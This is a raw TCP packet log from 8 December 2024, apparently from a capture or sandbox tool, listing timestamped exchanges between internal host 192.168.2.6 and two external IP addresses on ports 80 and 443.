Dec 8, 2024 13:31:53.295027018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.295111895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.295175076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.295838118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.295953035 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.413173914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.413228035 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.413299084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.413342953 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.413582087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.413631916 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.413688898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.413724899 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.414460897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.414565086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.414588928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.414633036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.415309906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.415363073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.415429115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.415471077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.416121960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.416168928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.416234970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.416346073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.417226076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.417278051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.417326927 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.417438030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.417849064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.417907000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.417927027 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.418031931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.418698072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.418761015 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.418785095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.418809891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.419563055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.419620037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.419631958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.419675112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.420404911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.420454025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.420528889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.420591116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.421261072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.421350002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.421390057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.421415091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.422113895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.422152996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.422200918 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.422238111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.422943115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.423049927 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.423055887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.423144102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.423823118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.423881054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.423979998 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.424019098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.424638033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.424684048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.424730062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.424772978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.425498962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.425546885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.425601006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.425690889 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.426373005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.426425934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.426448107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.426487923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.427190065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.427242041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.427315950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.427412987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.428085089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.428185940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.428227901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.428913116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.428962946 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.429085970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.429125071 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.429763079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.429806948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.429896116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.429932117 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.430602074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.430646896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.430763960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.430800915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.431421995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.431473970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.441591978 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.441673994 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.441735029 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.441844940 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.441860914 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.441871881 CET	49851	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.441878080 CET	443	49851	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.445125103 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.445158005 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.445291042 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.445488930 CET	49856	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.445498943 CET	443	49856	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.472240925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.472306013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.472420931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.472472906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.472686052 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.472733021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.472779036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.472950935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.473490000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.473545074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.473553896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.473582983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.474311113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.474356890 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.474673986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.474714041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.474720955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.474757910 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.475526094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.475574970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.475594044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.475635052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.476300955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.476349115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.476367950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.476406097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.477134943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.477176905 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.477272987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.477322102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.478032112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.478072882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.478236914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.478286028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.478905916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.478950977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.478988886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.479043007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.479676962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.479736090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.479819059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.479867935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.480597019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.480746984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.480786085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.480829954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.481548071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.481601954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.481686115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.481728077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.482376099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.482420921 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.482429028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.482467890 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.483084917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.483154058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.483230114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.483283043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.484077930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.484122992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.484167099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.484205008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.484826088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.484878063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.485023022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.485065937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.485712051 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.485759020 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.485821962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.485865116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.486371040 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.486551046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.486617088 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.486685991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.486726999 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.486824036 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.486845016 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.487277985 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.487282991 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.487426996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.487474918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.487559080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.487605095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.488233089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.488282919 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.488369942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.488415956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.489095926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.489149094 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.489227057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.489327908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.489954948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.490047932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.490070105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.490132093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.490783930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.490833044 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.490880966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.490921974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.491642952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.491688967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.491738081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.491811991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.492472887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.492531061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.492542982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.492587090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.493309021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.493360996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.493426085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.493508101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.494172096 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.494234085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.494281054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.494324923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.495007992 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.495063066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.495122910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.495165110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.495861053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.495912075 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.495997906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.496042967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.496722937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.496767998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.496844053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.496954918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.497570038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.497617006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.497625113 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.497653961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.498420954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.498492956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.498635054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.498683929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.499320984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.499377966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.499437094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.499494076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.605577946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.605638981 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.605730057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.605767965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.605979919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.606029034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.606103897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.606159925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.606822968 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.606867075 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.606928110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.607004881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.607697964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.607743025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.607805014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.607846022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.608545065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.608620882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.608628035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.608668089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.609385014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.609431028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.609618902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.609680891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.610388041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.610436916 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.610455990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.610488892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.611094952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.611319065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.611325026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.611356974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.611959934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.612005949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.612056017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.612123013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.612823963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.612871885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.612879992 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.612924099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.613734961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.613841057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.613888025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.614582062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.614624977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.614708900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.614754915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.615339994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.615386009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.615468025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.615566015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.616185904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.616296053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.616322994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.616365910 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.617043018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.617086887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.617156982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.617360115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.617893934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.617949009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.618000031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.618041039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.618755102 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.618802071 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.618820906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.618871927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.619609118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.619656086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.619678974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.619796991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.620487928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.620532036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.620552063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.620595932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.621305943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.621349096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.621583939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.621627092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.664403915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.664453983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.664485931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.664535046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.664901972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.664956093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.664973974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.665019989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.665648937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.665697098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.665889025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.665930986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.666507959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.666569948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.666771889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.666891098 CET	80	49835	185.215.113.206	192.168.2.6
